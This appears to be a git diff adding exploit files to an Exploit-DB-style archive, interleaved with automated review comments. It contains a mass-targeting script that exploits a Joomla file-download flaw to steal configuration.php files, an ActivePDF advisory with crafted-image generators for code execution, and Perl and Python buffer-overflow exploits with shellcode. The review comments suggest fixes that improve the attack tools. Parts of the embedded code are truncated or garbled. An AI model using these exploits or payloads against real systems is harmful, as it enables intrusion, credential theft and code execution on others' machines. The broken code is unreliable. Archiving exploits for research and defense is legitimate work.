+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Bangkok - Berlin - Linz - Luxembourg - Montreal
+Moscow - Munich - Kuala Lumpur - Singapore
+Vienna (HQ) - Vilnius - Zurich
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
\ No newline at end of file
diff --git a/exploits/php/webapps/44252.py b/exploits/php/webapps/44252.py
new file mode 100755
index 000000000..f7645b129
--- /dev/null
+++ b/exploits/php/webapps/44252.py
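Review bot: The first SQL-injection payload in section 3 reads `channelId=channelId=1-BENCHMARK(100000000, rand())`, which PHP parses as a single `channelId` parameter whose value starts with `channelId=`; substituted into `WHERE userid = {$userid}` that produces an unknown-column error rather than the timing delay, so the intended line is presumably `channelId=1-BENCHMARK(100000000, rand())`. The `/actions/vote_channel.php` excerpt also shows `$_POST["channelId"]` reaching the query with the `login_check` line commented out, so the remediation a reader needs is two-fold — cast with `(int)$_POST["channelId"]` or use a prepared statement, and restore the authentication check — whereas the Solution section only points at the vendor release. For the two `commonAjax.php` cases the quoted `$db->select(tbl('users'), ..., " email='$email'")` call is the injection point, and a one-line note that escaping or a placeholder there is the fix would make the advisory actionable for operators who cannot upgrade immediately.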
@@ -0,0 +1,265 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- +''' + + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. 
+ + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. 
+''' +try: + import urllib2 +except: + print "$ pip2 install urllib2" +try: + import argparse +except: + print "$ pip2 install argparse" +try: + import BeautifulSoup +except: + print "$ pip2 install BeautifulSoup" +try: + import urlparse +except: + print "$ pip2 install urlparse" +try: + import requests +except: + print "$ pip2 install requests" +try: + import threading +except: + print "$ pip2 install threading" +import time, sys , os +global Animation, slowprint, fastprint +os.system('clear') + +class Lab_Collors(): + vermelho = '\033[31m' + verde = '\033[32m' + azul = '\033[34m' + ciano = '\033[36m' + purple = '\033[35m' + amarelo = '\033[33m' + preto = '\033[30m' + branco = '\033[37m' + original = '\033[0;0m' + reverso = '\033[2m' + default = '\033[0m' + +def slowprint(s): + for c in s + '\n': + sys.stdout.write(c) + sys.stdout.flush() # defeat buffering + time.sleep(8./90) +#time.sleep(10./90) + +def fastprint(s): + for c in s + '\n': + sys.stdout.write(c) + sys.stdout.flush() # defeat buffering + time.sleep(1./50) + +def Animation(String, color): + animation = "|/-\\" + for i in range(15): + time.sleep(0.1) + sys.stdout.write("\r" + "[" + animation[i % len(animation)] + "]" + color + String) + sys.stdout.flush() + print('') + +print '' +parser = argparse.ArgumentParser(description='JOOMANAGER_Arbitrary_File_Download') +parser.add_argument('-t','--targets', action='store',help='--targets Targets.txt') +args = parser.parse_args() + + + +class Lab_Banners(): + Bulls = ''' + ╭━━━┳╮╱╱╱╱╱╱╱╭╮ + ┃╭━╮┃┃╱╱╱╱╱╱╭╯╰╮ + ┃╰━╯┃╰━┳━━┳━╋╮╭╋━━┳━━┳╮╭╮ + ┃╭━━┫╭╮┃╭╮┃╭╮┫┃┃╭╮┃━━┫╰╯┃ + ┃┃╱╱┃┃┃┃╭╮┃┃┃┃╰┫╭╮┣━━┃┃┃┃ + ╰╯╱╱╰╯╰┻╯╰┻╯╰┻━┻╯╰┻━━┻┻┻╯ + , . 
╭╮╱╱╱╱╱╭╮ + /| |\ ┃┃╱╱╱╱╱┃┃ + |-| łαbørαŧøriø Ŧαηŧαsмα |-| ┃┃╱╱╭━━┫╰━╮ + [ "-.____ ____.-" ] ┃┃╱╭┫╭╮┃╭╮┃ + \_ / \ ___.___ / \ _/ ┃╰━╯┃╭╮┃╰╯┃ + "-__[ ===!=== ]__-" ╰━━━┻╯╰┻━━╯ + | | +==========================================================+ + .-"" _|=__ | __=|_ ""-, | COM_JOOMANAGER ARBITRARY FILE DOWNLOAD | + `""" \ "`==´ `==´" / """´ +==========================================================+ + \ \\ // / | [*] GoogleDork: allinurl:index.php?option=com_joomanager | + \ |\___/| / | [*] GoogleDork: allinurl:/component/joomanager/ | + \,;-----;./ | [*] Coded: Luth1er [*] Date: 30 - 06 - 2017 | + | @@ @@ | | [*] GitHub: https://github.com/Luth1er | + \ -"""- / | - I take no responsibilities for the | + `-----´ | - use of this program ! | + +==========================================================+''' +if not args.targets: + os.system('clear') + print Lab_Collors.azul+Lab_Banners.Bulls + print '' + print Lab_Collors.ciano+"[*] Usage: " + print Lab_Collors.branco+"Joomanager_Afd.py --target Targets.txt" + print Lab_Collors.branco+"Joomanager_Afd.py -t Targets.txt" + print '' + exit() + +print Lab_Collors.azul+Lab_Banners.Bulls +slowprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.purple+"@DreadPirateRobertt") +fastprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.azul+"t.me/Phantasm_Lab") + + +class COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(threading.Thread): + global Animation, fastprint + def __init__(self, targets): + threading.Thread.__init__(self) + targets = open(targets, 'r').readlines() + self.targets = targets + self.process = None + def run(self): + try: + count = 0 + print '' + Animation("COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD", Lab_Collors.verde) + print '' + for target in self.targets: + try: + target = target.strip() + exploit3r = "index.php?option=com_joomanager&controller=details&task=download&path=configuration.php" + exploit_dir = str(target+exploit3r) + try: + path = urlparse.urlparse(target).path + url_title = target.replace(path, "") + title = 
requests.get(url_title) + except: + title = requests.get(target) + exploit = urllib2.urlopen(exploit_dir) + + soup = BeautifulSoup.BeautifulSoup(title.content.decode('utf-8','ignore')) + Scraping_title = str(soup.title.text) + with open(soup.title.text+".php","wb") as Attatchment: + Attatchment.write(exploit.read()) + print '' + print Lab_Collors.verde+"+==========================+" + print Lab_Collors.verde+"| Exploit Information: |" + print Lab_Collors.verde+"+================================================================================" + print Lab_Collors.purple+"[+] Target: {}".format(Lab_Collors.amarelo+url_title) + print Lab_Collors.purple+"[+] Title: {}".format(Lab_Collors.azul+Scraping_title) + fastprint(Lab_Collors.purple+"[+] Exploited: ========================================================> 100%") + print Lab_Collors.purple+"[+] Server: {}".format(str(Lab_Collors.amarelo+title.headers['server'])) + try: + print Lab_Collors.purple+"[+] Connection: {}".format(Lab_Collors.branco+str(title.headers['Connection'])) + except: + pass + print Lab_Collors.purple+"[+] Exploit: {}".format(Lab_Collors.vermelho+exploit3r) + print Lab_Collors.purple+"[+] Path: "+Lab_Collors.ciano+"/COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD/Title.php" + print Lab_Collors.verde+"+================================================================================" + print '' + count = count + 1 + except KeyboardInterrupt: + print("Exiting") + sys.exit(1) + except Exception as Error: + print "Error as {}".format(Error) + pass + Animation("Logout....", Lab_Collors.vermelho) + print Lab_Collors.branco+"[!] Total Exploited: %s" % str(count) + print '' + sys.exit(1) + except KeyboardInterrupt: + print "Exiting...." 
+ sys.exit(1) + +def main(): + try: + threads = 1 + for host in range(int(threads)): + Init_Atck = COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(args.targets) + Init_Atck.daemon=True + Init_Atck.start() + while True: time.sleep(100) + except (KeyboardInterrupt, SystemExit): + print'' + Animation(" Exit Threading....", Lab_Collors.vermelho) + + +if __name__ == '__main__': + try: + main() + except Exception as e: + print "[!] Error as %s" % e + exit() + except KeyboardInterrupt: + fastprint(Lab_Collors.vermelho+"[!] Keyboard as Interrupt....") + exit() \ No newline at end of file diff --git a/exploits/windows/dos/44251.txt b/exploits/windows/dos/44251.txt new file mode 100644 index 000000000..6d84eda02 --- /dev/null +++ b/exploits/windows/dos/44251.txt 
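Review bot: The output file name in `run`, `with open(soup.title.text+".php","wb") as Attatchment:`, is taken verbatim from the remote page's `<title>`, so a response with no title (`soup.title` is `None`) fails the iteration with an AttributeError that the broad `except Exception` merely prints, and a title containing path separators writes outside the working directory of whoever runs the script; build the name from `urlparse.urlparse(target).netloc` instead, or reduce the title to a safe character set before opening it. The import guards at the top print `$ pip2 install urllib2` (and the same for argparse, urlparse and threading), but those modules are part of the Python 2 standard library, the bare `except:` hides the real ImportError, and the script keeps running until it dies later with a NameError; let the ImportError propagate, or `sys.exit(1)` after printing the hint. The target list opened in `__init__` with `open(targets, 'r').readlines()` is never closed; `with open(targets) as fh: self.targets = fh.readlines()` is the one-line fix.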
@@ -0,0 +1,201 @@ +ActivePDF Toolkit < 8.1.0 multiple RCE + +Introduction +============ +The ActivePDF Toolkit is a Windows library which enhances business +processes to stamp, stitch, merge, form-fill, add digital signatures, +barcodes to PDF. Both .NET and native APIs are provided. Amongst many +other operations, this library can be used by applications to transform +images to PDF files. + +Multiple vulnerabilities were identified in the Pictview image processing +library embedded by the Toolkit and signed by ActivePDF. They could allow +remote attackers to compromise applications relying on the Toolkit to +process untrusted images. Note that, while the example instances hereafter +use “exotic” file types, the parser determines the image type from magic +bytes, ignoring file extensions in most cases. + +CVE +=== +CVE-2018-7264 + +Affected versions +================= +ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023) + +Author +====== +François Goichon - Google Security Team + +CVE-2018-7264 +============= +ActivePDF Toolkit < 8.1.0.19023 multiple RCE + +Summary +------- +An image processing library embedded in the ActivePDF Toolkit product is +prone to multiple BSS out-of-bound and signedess errors which can yield +direct EIP control by overwriting function pointers, error handling +structures or IAT entries. Note that the affected library does not enable +ASLR. + +Reproduction +------------ +The following scripts can be used to generate crafted image files which +achieve EIP control when parsed or converted by the ActivePDF Toolkit (e.g. +via the ImageToPDF method), through different root causes. These examples +can be reproduced through both the .NET and native APIs and independently +from file extensions, however the .NET layer will hide the native crashes +and return -1. This may crash the library with a lock on, so only use in +test environments. 
+ +* Interchange File Format (.iff) and derivates +--- +#!/usr/bin/env python2 +# +# eax=28147510 ebx=00009c1c ecx=28147510 edx=00009c1c esi=28140e90 +edi=02930a6c +# eip=41414141 esp=0061f264 ebp=0061f26c iopl=0 nv up ei pl nz na +po nc +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00010202 +# 41414141 ?? ??? + +from struct import pack + +header = "FORMXOXOILBM" + +bodycontents = "AAA" +body = "BODY" + pack(">I", len(bodycontents)) + bodycontents +while (len(body) % 2) == 1: + body += "\x00" + +base = 0x28147510 +payload = pack("I", len(payload)) + payload +while (len(cmap) % 2) == 1: + cmap += "\x00" + +outp = header + cmap + body +assert len(outp) >= 0x28 + +with open("test.iff", "wb") as f: + f.write(outp) +--- + +* Zoner Draw images (.zmf, .zbr) +--- +#!/usr/bin/env python2 +# +# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008 +edi=028e0a6c +# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac +pe cy +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00010297 +# 41414141 ?? ??? + +from struct import pack + +header = pack("IIIIIII", 0x59A66A95, 0x100, 1, 8, 0, 2, 1) + +base = 0x28141504 +payload = "".ljust(0x28151124 - base, "\x00") + pack("I", len(payload)+1) + payload + +with open("test.ras", "wb") as f: + f.write(outp) +--- + +* Truevision Targa images (.bpx) +--- +#!/usr/bin/env python2 +# +#eax=28151110 ebx=00000004 ecx=00000008 edx=2813eb10 esi=00000008 +edi=028f0a6c +#eip=41414141 esp=0061f2a0 ebp=0061f2e8 iopl=0 nv up ei ng nz ac pe +cy +#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00010297 +#41414141 ?? ??? + +from struct import pack + +target = 0x2815112C +payload = "AAAA" + +# TGA / PIC / BPX +base = { 3: 0x28147510, 4: 0x2814550c } +align = None +for al in [3, 4]: + if ((target - base[al]) % al) == 0: + align = al + break +assert align + +header = "\x00\x01\x00" +header += pack("= 8.1.0 (build 8.1.0.19023), which fixes the +problem by removing the affected image processing library. 
Note that this +also fixes the similar ZDI-16-354 vulnerability. + +For more information and guidance, please contact the ActivePDF support +through their portal (https://support.activepdf.com). + + +Disclosure timeline +=================== +2017/11/28 - Report sent to ActivePDF support +2017/11/28 - Support acknowledges the issue and confirms that the library +is scheduled to be removed from the product +2018/01/29 - Received notification from the ActivePDF support that the +Pictview image processing library had been removed from ActivePDF in build +8.1.0.19023 +2017/02/26 - Public disclosure \ No newline at end of file diff --git a/exploits/windows/local/44243.pl b/exploits/windows/local/44243.pl new file mode 100755 index 000000000..85ee115d2 --- /dev/null +++ b/exploits/windows/local/44243.pl 
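Review bot: The final timeline entry, `2017/02/26 - Public disclosure`, is dated before the `2017/11/28` report and the `2018/01/29` fix notification it follows, so the year looks like a typo; `2018/02/26 - Public disclosure` would be consistent with the rest of the timeline and with the CVE-2018 identifier in the header. The embedded reproduction scripts also appear truncated in this copy — for example the Targa section ends with `header += pack("= 8.1.0 (build 8.1.0.19023), which fixes the` running straight into the Fix section — which reads like text between `<` and `>` having been dropped during import rather than an error by the author; it is worth checking the committed file against the original advisory so the record stays complete.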
@@ -0,0 +1,177 @@ +#!/usr/bin/perl +# ######################################################################## +# Title: Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit +# Vulnerability Type: Execute Code, Overflow UTF-16LE buffer, Memory corruption +# Date: Feb 18, 2018 +# Author: James Anderson (synthetic) +# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31 +# Exploit mitigation: There is no /SAFESEH, SEHOP, /GS, DEP, ASLR +# About: The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley +# Tested on: Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32 +# ######################################################################## +# _ _ _ _ +# ___ _ _ _ __ | |_| |__ ___| |_(_) ___ +# / __| | | | '_ \| __| '_ \ / _ \ __| |/ __| +# \__ \ |_| | | | | |_| | | | __/ |_| | (__ +# |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___| +# |___/ +# +# ######################################################################## + + my $path = "/media/s4/DragonR.m3u"; + + my $buffer_length = 5000; + my $suboffset = 0x104; + my $NOP1 = "\x6F"; # add [edi], ch + my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx + + # [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame + my $crash = "A" x 260; + # [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame + $crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX + $crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR + + my $offset_to_payload = length($crash); + + # [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode. 
+ # [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode] + $crash .= $NOP1; # NOP-eq + $crash .= "\x6a\x59"; # push 0 # pop ecx + $crash .= $NOP1; # NOP-eq + $crash .= "\x41"; # inc ecx + $crash .= "\xCC"; # add ah, cl # eax = eax + 0x100 + $crash .= $NOP1; # NOP-eq + $crash .= "\x41"; # inc ecx + $crash .= "\xC8"; # add al, cl + $crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC; + + # [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x3b\x41"; # mov edx, 41003b00 + $crash .= "\x30"; # add [eax],dh + $crash .= $NOP1; # NOP-eq + + # [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00 + $crash .= "\x40"; # inc eax + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xec\x41"; # mov edx, 4100ec00 + $crash .= "\x30"; # add [eax],dh + + # [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x45\x41"; # mov edx, 41004500 + $crash .= "\x30"; # add [eax],dh + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x46\x41"; # mov edx, 41004600 + $crash .= "\x30"; # add [eax],dh + + # [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x68\x41"; # mov edx, 41006800 + $crash .= "\x30"; # add [eax],dh + + # [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x78\x41"; # mov edx, 41007800 + $crash .= "\x30"; # add [eax],dh + + # [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x2F\x41"; # mov edx, 41002F00 + $crash .= "\x30"; # add [eax],dh + + # [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq 
eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x63\x41"; # mov edx, 41006300 + $crash .= "\x30"; # add [eax],dh + + # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x64\x41"; # mov edx, 41006400 + $crash .= "\x30"; # add [eax],dh + + # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x8d\x41"; # mov edx, 41008d00 + $crash .= "\x30"; # add [eax],dh + + # [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xf8\x41"; # mov edx, 4100f800 + $crash .= "\x30"; # add [eax],dh + + # [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xb8\x41"; # mov edx, 4100b800 + $crash .= "\x30"; # add [eax],dh + + # [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x49\x41"; # mov edx, 41004900 + $crash .= "\x30"; # add [eax],dh + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x4A\x41"; # mov edx, 41004A00 + $crash .= "\x30"; # add [eax],dh + + # [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x77\x41"; # mov edx, 41007700 + $crash .= "\x30"; # add [eax],dh + + # [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xd0\x41"; # mov edx, 4100d000 + $crash .= "\x30"; # add [eax],dh + + # [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe) + # *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP + $crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx + $crash .= 
$NOP1."\x6A"; # NOP1 + NOP1-eq (push 0) + + + # [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe +my $shellcode = +"\x50". # "\x8b". # # BAD BYTE + # "\xec". # 0 +"\x55". # "\x55". + # "\x8b". # 0 # BAD BYTE +"\xec". # "\xec". + # "\x68". # 0 +"\x65". # "\x65". + # "\x78". # 0 +"\x65". # "\x65". + # "\x2F". # 0 +"\x68". # "\x68". + # "\x63". # 0 +"\x6d". # "\x6d". + # "\x64". # 0 +"\x2e". # "\x2e". + # "\x8d". # 0 +"\x45". # "\x45". + # "\xf8". # 0 +"\x50". # "\x50". + # "\xb8". # 0 +"\xc7". # "\xc7". + # "\x93". # 0 # BAD BYTE +"\xc2". # "\xc2". + # "\x77". # 0 +"\xff"; # "\xff". + # "\xd0"; # 0 + + $crash .= $shellcode; + + $crash .= "C" x ($buffer_length - length($crash)); + open(myfile, ">$path"); + print myfile $crash; \ No newline at end of file diff --git a/exploits/windows/local/44244.py b/exploits/windows/local/44244.py new file mode 100755 index 000000000..8c1619e87 --- /dev/null +++ b/exploits/windows/local/44244.py 
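Review bot: The write at the end, `open(myfile, ">$path");` followed by `print myfile $crash;`, never checks that the hard-coded `/media/s4/DragonR.m3u` could be created and never closes the handle, so on any other machine the script finishes silently with nothing written; use the three-argument form with a lexical handle, `open(my $out, '>', $path) or die "cannot write $path: $!";` … `close($out);`, and take `$path` from `@ARGV` rather than hard-coding one host's mount point. Two consecutive sections of the byte-building comments are both labelled `[2.8]`; renumbering the second keeps the section numbers a reliable map of the buffer layout.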
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+
+ #
+ # Exploit Author: bzyo
+ # Twitter: @bzyo_
+ # Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
+ # Date: 02-22-2018
+ # Vulnerable Software: Dup Scout Enterprise v10.5.12
+ # Vendor Homepage: http://www.dupscout.com
+ # Version: 10.5.12
+ # Software Link: http://www.dupscout.com/downloads.html
+ # Tested On: Windows 7 x86
+ #
+ # bad chars \x00\x0a and everything above \x80
+ #
+ # PoC:
+ # 1. generate dupscout.txt, copy contents to clipboard
+ # 2. open app, select Server, select Connect
+ # 3. type anything into Share Name, paste dupscout.txt contents into User Name
+ # 4. select Connect and then OK
+ # 5. pop calc
+ #
+
+filename="dupscout.txt"
+
+junk = "A"*792
+
+#0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll]
+eip = "\x44\x11\x02\x10"
+
+fill = "\x43"*560
+
+#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
+#Payload size: 440 bytes
+calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
+"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
+"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
+"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
+"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
+"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
+"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
+"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
+"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
+"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
+"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
+"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
+"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
+"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
+"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
+"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
+"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
+"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
+"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
+"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
+"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
+"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
+"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
+"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
+"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
+"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
+"\x55\x43\x30\x41\x41")
+
+buffer = junk + eip + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/webapps/442321.txt b/exploits/windows/webapps/44241.txt
similarity index 100%
rename from exploits/windows/webapps/442321.txt
rename to exploits/windows/webapps/44241.txt
diff --git a/files_exploits.csv b/files_exploits.csv
index 4c8084cf1..44dd04c66 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5888,6 +5888,8 @@ id,file,description,date,author,type,platform,port
 44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos,
